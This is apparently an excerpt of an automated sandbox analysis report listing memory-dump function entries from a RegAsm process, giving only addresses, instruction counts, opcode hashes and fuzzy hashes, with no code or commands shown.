                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1758d30aadd4858c76fae2a7e312665fd81ce8ccd33cafdb51293a58623aeaf1
                                                      • Instruction ID: 69758b9b8f8b2f720b7f37bfcedcdf5f196bf30bc3a03529d4e754cc49836e22
                                                      • Opcode Fuzzy Hash: 1758d30aadd4858c76fae2a7e312665fd81ce8ccd33cafdb51293a58623aeaf1
                                                      • Instruction Fuzzy Hash: 4C0104346043058FD325AF71E40466A7BE3FFC5315B14862ED0478B655CF74AC0B8BA2
                                                      Function 068F8350 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7dae0441d71110253d128c38dad7cec5a6f55c6cd2f7c167264faa16b118343c
                                                      • Instruction ID: f0441724a67f59e2925b50ab9acff48f74641b0469d09a172b82ecdf78999881
                                                      • Opcode Fuzzy Hash: 7dae0441d71110253d128c38dad7cec5a6f55c6cd2f7c167264faa16b118343c
                                                      • Instruction Fuzzy Hash: 47018472B102199BDF50DEA9EC44ABFBBBAEBD4251B24403AE605D3240DF30A91587A5
                                                      Function 0701B220 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5dc0bfdb158483f30eff43b6ca4d7d5dc90c0258e83cf8650c3179760cb995f
                                                      • Instruction ID: c5bb88a28f4bb68a58e419e345095c820a709bf9ab392d366b257b59a1904298
                                                      • Opcode Fuzzy Hash: e5dc0bfdb158483f30eff43b6ca4d7d5dc90c0258e83cf8650c3179760cb995f
                                                      • Instruction Fuzzy Hash: 951103B1E002199FCB54DFA8C450AEEBBF2FF88310F14816AD515B7390DB346A45CBA1
                                                      Function 0701B9C8 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbdeabb2d7549f2efc8bf24022b0cdd42d65220f6763b6e874a6a483a7db9a2d
                                                      • Instruction ID: 11a3d42cab4c7beec1c3079be6b5edb7c93f3b79394e37ffc8590ec70a7eb2c1
                                                      • Opcode Fuzzy Hash: dbdeabb2d7549f2efc8bf24022b0cdd42d65220f6763b6e874a6a483a7db9a2d
                                                      • Instruction Fuzzy Hash: 9D1115B4D00219DFCB55EFB9D544AADBBF1FB49311F1096AAD825A3384EB305A40CF41
                                                      Function 068FBC70 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d391d3c21da6cc5c675ebfcc44a2c9d96485d25a12638af111a10911919be28a
                                                      • Instruction ID: 2154dc4c88d00ca4548613506cf9d5d0f4591c00d6fc468bec2681cf4a1a730c
                                                      • Opcode Fuzzy Hash: d391d3c21da6cc5c675ebfcc44a2c9d96485d25a12638af111a10911919be28a
                                                      • Instruction Fuzzy Hash: 4901BC3120020A4F8795BB35E45452E3FE3FEC0161344482DD5078B618DE707E4F87A2
                                                      Function 068FE8B0 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc34fcc28cfcb24820f72013a0bc2c8ed180879e49aca5d18fc5e689bf139360
                                                      • Instruction ID: 87aef4a86eadd4eab7c1cd241625d0d7ae1303ff40fd700899ca2940ad355003
                                                      • Opcode Fuzzy Hash: fc34fcc28cfcb24820f72013a0bc2c8ed180879e49aca5d18fc5e689bf139360
                                                      • Instruction Fuzzy Hash: 8F01D6386193089FCB06EF74D8149AA3FBAEF8620075484EDE501CB362DB36DD16D7A1
                                                      Function 0141DA25 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659813626.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_141d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e355aee21187555d946a3e2c8a13c2226196321e4af85dad2275742c9e6b3fc4
                                                      • Instruction ID: 189b7ab45a4faaef613ecda7953409f17080e7cd2185b27334085e5067a2099b
                                                      • Opcode Fuzzy Hash: e355aee21187555d946a3e2c8a13c2226196321e4af85dad2275742c9e6b3fc4
                                                      • Instruction Fuzzy Hash: D3012BB290C3409EE720CB55CDC8767BF98DF41266F18C46BDD584F29AC6749845CAB1
                                                      Function 0701EC03 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a9d71fe589502f0602d6fc3222c8fc5bccaaeccd5f574e8f2d450da9be43dd6
                                                      • Instruction ID: 524a05de511bb1cb53aed18ae4367261305fabceb99df7521bb38e72a09f7615
                                                      • Opcode Fuzzy Hash: 3a9d71fe589502f0602d6fc3222c8fc5bccaaeccd5f574e8f2d450da9be43dd6
                                                      • Instruction Fuzzy Hash: D1118BB4E00208EFCB00DFA4E58959DBBB1FF4A302F1082AAC8059B324E734AE05CF50
                                                      Function 0701AB58 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95c19c71afe140398a1c66cbf7c906e3edfdff59fdac734a40955df08cd020a2
                                                      • Instruction ID: d78883797c20e1f14407a496248a016819e221c5cd3ca787be6ffeb01ad54d5c
                                                      • Opcode Fuzzy Hash: 95c19c71afe140398a1c66cbf7c906e3edfdff59fdac734a40955df08cd020a2
                                                      • Instruction Fuzzy Hash: D401D775E002199BCB14DBA8D855AEEBBB6FB88210F50812AD516A7390DB395901CBD1
                                                      Function 068FC4A8 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a0a30e4168486d30cd92f8ecce88cd236efee65ad15ca0e51597ce9ea11c5ea6
                                                      • Instruction ID: b61651c3b6d769992e9d987b42bcbb7d532a1bb81d6f6c00dffe088ada949cf3
                                                      • Opcode Fuzzy Hash: a0a30e4168486d30cd92f8ecce88cd236efee65ad15ca0e51597ce9ea11c5ea6
                                                      • Instruction Fuzzy Hash: 78019E346003098FD324AF75D00866A7BE3FFD5316B108A2DC14B8BA58CF74AC0B8B91
                                                      Function 068F5508 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 546d740d57b478a27a8ded6c54de5b237033b46324e657dadf95611d1bd121eb
                                                      • Instruction ID: 343dc24dc9632b00f2e8ec3f3bff6653448d4987e28dd4fa1f8657105a21e5cb
                                                      • Opcode Fuzzy Hash: 546d740d57b478a27a8ded6c54de5b237033b46324e657dadf95611d1bd121eb
                                                      • Instruction Fuzzy Hash: 0A01F930A21711CFDBA48B75E40452B77F3BF9C209704883CE342C6504DA71E482CB92
                                                      Function 0701EC10 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee52ddb01e85c7a65021e8cc0127a96345b45e5d5fe5790a9416d78a4f11ed9a
                                                      • Instruction ID: d3869022d24908a4ffc21d4956487944c8ad35e92bbb5e90f841059469194926
                                                      • Opcode Fuzzy Hash: ee52ddb01e85c7a65021e8cc0127a96345b45e5d5fe5790a9416d78a4f11ed9a
                                                      • Instruction Fuzzy Hash: B0111BB4E00209EFCB44DFA4E58999DBBF2FB49705F2085A9C80597314E734AE05CF50
                                                      Function 068FC170 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cac743d980eef1cd07cd74cdde8b09b14ea2ea954ca1cc7ce0bb56ad014b32e
                                                      • Instruction ID: 14c66f12f74d6b38458f1da7c9695b1bd8d7ca0c8f6bbb182565d910b136f521
                                                      • Opcode Fuzzy Hash: 0cac743d980eef1cd07cd74cdde8b09b14ea2ea954ca1cc7ce0bb56ad014b32e
                                                      • Instruction Fuzzy Hash: 2501A2301057059FD722EF26E8095A2BFF6FF49300700861EE44782A11DB30A94ACF94
                                                      Function 068F8F50 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fe0b061620bfb75d2b6e32601b6dfe522c245ca2133bb8a5eabfdef85a37a53
                                                      • Instruction ID: 9b4d812c660ad356c3591fdbf4ce56bfc35d08c592c2a0b5e30a299676670add
                                                      • Opcode Fuzzy Hash: 6fe0b061620bfb75d2b6e32601b6dfe522c245ca2133bb8a5eabfdef85a37a53
                                                      • Instruction Fuzzy Hash: 0401C4B4D1420AEFDB84DFA9D9456AEBBF5FB48301F1085A99515A3350E7740A40CF91
                                                      Function 068FFF50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2819869bf3f4fefbf930f20195ffef147c01305a684b22b3f27322802db481b2
                                                      • Instruction ID: 47563ec806bad08c4b6abd5879d5ddb6c9ad152090962b061bce4bb40fe248b1
                                                      • Opcode Fuzzy Hash: 2819869bf3f4fefbf930f20195ffef147c01305a684b22b3f27322802db481b2
                                                      • Instruction Fuzzy Hash: B7F0E2317052042FD3009B6AAC41EABBFEDEFC9620B1580AFE104C7362C9709C00CAB4
                                                      Function 068FACB8 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb1d19b78fc18ec68b462908def2ea5caf94249f74ffb21cc756bb9e22939b77
                                                      • Instruction ID: 6eb633844607a45c00e9ca5da0eb399ba5880af96a723be081a46d7c0b81a338
                                                      • Opcode Fuzzy Hash: bb1d19b78fc18ec68b462908def2ea5caf94249f74ffb21cc756bb9e22939b77
                                                      • Instruction Fuzzy Hash: E1F0E97160E2555FC7163775AC140AD3FA5DD8756234440EEE287CB665CA145906C3E2
                                                      Function 068FADE9 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acac234c95183bc80b5dca9e5763f22f29cdfc0cb0950ce28c9092f7d6a84c01
                                                      • Instruction ID: 2ecf50a01e278c9e587e3a91f10c2ac8235a3c273515a9a5d8e963aabec9d5b4
                                                      • Opcode Fuzzy Hash: acac234c95183bc80b5dca9e5763f22f29cdfc0cb0950ce28c9092f7d6a84c01
                                                      • Instruction Fuzzy Hash: BDF027312062007FC7202B6AE854BCFBEDBEFCA760F00403DE10B83646CA61284543B9
                                                      Function 0141DA24 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659813626.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_141d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a7daf0e2e13b028c778088ac1d335572c705deadd110a97cc3ce63ce51186b1
                                                      • Instruction ID: 564876168bd72bee8791bd764d5e084cc74e414e9ee8553c3c166a8deb68f7a3
                                                      • Opcode Fuzzy Hash: 6a7daf0e2e13b028c778088ac1d335572c705deadd110a97cc3ce63ce51186b1
                                                      • Instruction Fuzzy Hash: A5F0C2724083409EE7148E09CD88B63FF98DB40675F18C45BED089E29AC278A844CBB1
                                                      Function 068F6EA0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab962525bca1ae621ce4dd8a3a4077d1398d130362838fb936397032c3c725a8
                                                      • Instruction ID: a792b93f5ad28ef4d2d0cb13c8855978a4f739e84672914eb713257660966729
                                                      • Opcode Fuzzy Hash: ab962525bca1ae621ce4dd8a3a4077d1398d130362838fb936397032c3c725a8
                                                      • Instruction Fuzzy Hash: 3AF012762041E83F8B518E9A5C10DFF7FEDDA8E5627084156FF98D2151C429C921ABB0
                                                      Function 068F67C8 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60a86a42cd3ba624a9be69c284e4316726dc02e393554e7539c0baa12eec88fc
                                                      • Instruction ID: cc16e93fbfa3cbb79982937a2aa4117e20cba53e6cf4616822f75cbda97d2499
                                                      • Opcode Fuzzy Hash: 60a86a42cd3ba624a9be69c284e4316726dc02e393554e7539c0baa12eec88fc
                                                      • Instruction Fuzzy Hash: 15F0B431B603009FD7208B68DC05F997FE59F46711F158266E324CF1E2E7B1E8469750
                                                      Function 068FC110 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 787e78a580ac10fe4bb4bc9221a893a82db647fd535ddd9692ba385ac8e32964
                                                      • Instruction ID: 991101f41deea47289128869b0a5fa0fea43959af7741877c31277cb936cfef8
                                                      • Opcode Fuzzy Hash: 787e78a580ac10fe4bb4bc9221a893a82db647fd535ddd9692ba385ac8e32964
                                                      • Instruction Fuzzy Hash: B9F02B3020A3E14FC722E725E81469B3FE69F82204B08059EE182CB652CA616D0BC7A2
                                                      Function 068F8FC0 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f38568f9f02c61785961092846c8caad0c1df1f542c8c79c4d57bb41af95684b
                                                      • Instruction ID: fdea3991691583e69b0de61a6d9ac124ff56e713ebc3d5feb91207b3a59ca18b
                                                      • Opcode Fuzzy Hash: f38568f9f02c61785961092846c8caad0c1df1f542c8c79c4d57bb41af95684b
                                                      • Instruction Fuzzy Hash: 47F06DB5C18259DFDB80CFA4C8565EDBFB0EB5A301F0441DAE546E7361E6794A41CB40
                                                      Function 068F8341 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfae335f45004259e5a257b049b0aced60ad2124c4335b920421ae65725c3538
                                                      • Instruction ID: 9cb9945182cd43c56cca862df330a71678aaff05bdcdb78b39f8a41c91f763d9
                                                      • Opcode Fuzzy Hash: cfae335f45004259e5a257b049b0aced60ad2124c4335b920421ae65725c3538
                                                      • Instruction Fuzzy Hash: A8F0EC76F102154BCF50CA69AC456FF7BB9EB44251B180037DA24D3240FB34941A87A0
                                                      Function 0701C716 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3a270889129bad879f4455468508fcaa52807d652d7a3a4773f2c9ffb9e60ef
                                                      • Instruction ID: 6b0cf84b687ffe5764ca6b1079eb10b5c5e017a017f7f877ded8e2be30a178f3
                                                      • Opcode Fuzzy Hash: c3a270889129bad879f4455468508fcaa52807d652d7a3a4773f2c9ffb9e60ef
                                                      • Instruction Fuzzy Hash: A9F0FE75A00619AFDB54DE69D8449DFBBFAFF84310F14C265E908D7200D7709A54CBA1
                                                      Function 068F54F8 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d759424885ef8f27e208c36ecd475d865b725bc97d45b01ed562bc5d6232ad93
                                                      • Instruction ID: d45afa21661b7d49fbee5dc5b6b13a381e40a67083eb0635274a9ad7f28a759f
                                                      • Opcode Fuzzy Hash: d759424885ef8f27e208c36ecd475d865b725bc97d45b01ed562bc5d6232ad93
                                                      • Instruction Fuzzy Hash: E1F024359207518FDBA4CBA1D90176FBBB2BF84319F08886CD14286919DBB4E486CB40
                                                      Function 068FAC60 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b006ca177579bb9d21fedd9fbc6dfb94e4d1adbe7d263932f3d48a1de683d23
                                                      • Instruction ID: 4eb0e0e0e4ec87d961880971653ef83b3fcd18db80df4834f285ce84253c8eac
                                                      • Opcode Fuzzy Hash: 8b006ca177579bb9d21fedd9fbc6dfb94e4d1adbe7d263932f3d48a1de683d23
                                                      • Instruction Fuzzy Hash: 43F0A73160D2951FC2137B38AC245EE3F66DAC752130800EBE186CB293CE140946C7E6
                                                      Function 0701C711 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e5f9b83df3a8d1bc76ef2209af0f5a20c9ae3f91fcfed608546227daea29aa4
                                                      • Instruction ID: 50fbd5a98cd847c402a232c3fbe01dc3361e09704f015ab35ea341c71933ca3d
                                                      • Opcode Fuzzy Hash: 4e5f9b83df3a8d1bc76ef2209af0f5a20c9ae3f91fcfed608546227daea29aa4
                                                      • Instruction Fuzzy Hash: 56F034B5A0011AAFEB54DE68D8889DABBF6FF88310F14C665E908D3600D7709A448B90
                                                      Function 068FFF60 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dee2dd63901265bcc081599b9cef5ad65c1b0580e5b5ec33549de58a01069871
                                                      • Instruction ID: 3fc08a4eb83ee670424e38f54bc6b5b4a4c84184cfcd98b0ac8cc51b82a8dab7
                                                      • Opcode Fuzzy Hash: dee2dd63901265bcc081599b9cef5ad65c1b0580e5b5ec33549de58a01069871
                                                      • Instruction Fuzzy Hash: 37E06D317002186FD3049B5A9C40E6BFBEDFFD9620B25806EE504D7360CAB0AC0186A4
                                                      Function 068FADF8 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d41bdfb122ce4eae8547a336bac7f46969ba8597d7c372daa45d8fc5ae63587
                                                      • Instruction ID: 231648968759de2ee2c31c511c1b7f6afa2bcfee7c33bbe16e9b9b83d80809be
                                                      • Opcode Fuzzy Hash: 4d41bdfb122ce4eae8547a336bac7f46969ba8597d7c372daa45d8fc5ae63587
                                                      • Instruction Fuzzy Hash: 8FE092313062116FC7102A5AE448A9EBEDAEFCA761B00803DE20FC3645CA712C0547A9
                                                      Function 068FC180 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4ccbe419491dedfbe899e855b5e6abc823e574e54d075f68e31f930334a7604
                                                      • Instruction ID: 31332d6835d28c55c818627aee577d2915047b1e6b65f66aca47414696e4645a
                                                      • Opcode Fuzzy Hash: a4ccbe419491dedfbe899e855b5e6abc823e574e54d075f68e31f930334a7604
                                                      • Instruction Fuzzy Hash: 3CF01D75501B058FD715EF26E448566BBF6FB88351B00C62EE94B82A14DB70A94ACF84
                                                      Function 068FCC38 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8269715850a431329bc50d5d7b317487be1b02debb48e481581ee799f7db0857
                                                      • Instruction ID: 4fadaf3a30850c69f90d8d4b1f7311b17973d0ecc40cbeadb24a375cac8cf725
                                                      • Opcode Fuzzy Hash: 8269715850a431329bc50d5d7b317487be1b02debb48e481581ee799f7db0857
                                                      • Instruction Fuzzy Hash: D5E048311163649FDB16FA16FC045DB3F55BF55955B044255E1008765BC630194787E3
                                                      Function 068FB500 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 476892701fe869011cae93513b461c700689ea3d183d23466deffb0839e96966
                                                      • Instruction ID: e14a663fe6dabe397b2aba2d013f0a98b4998ef3e8bfda03b2d066c1a33b3d2d
                                                      • Opcode Fuzzy Hash: 476892701fe869011cae93513b461c700689ea3d183d23466deffb0839e96966
                                                      • Instruction Fuzzy Hash: C5F03935D0020DAFCB41EFB4D9488CEBFB9EB44200F1042A6E985E3244EA305F46DF81
                                                      Function 068FC120 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a9193d0b46e0e2139bb8c1f3c6cda7ea7821c56f935ce304348813a49c0d970
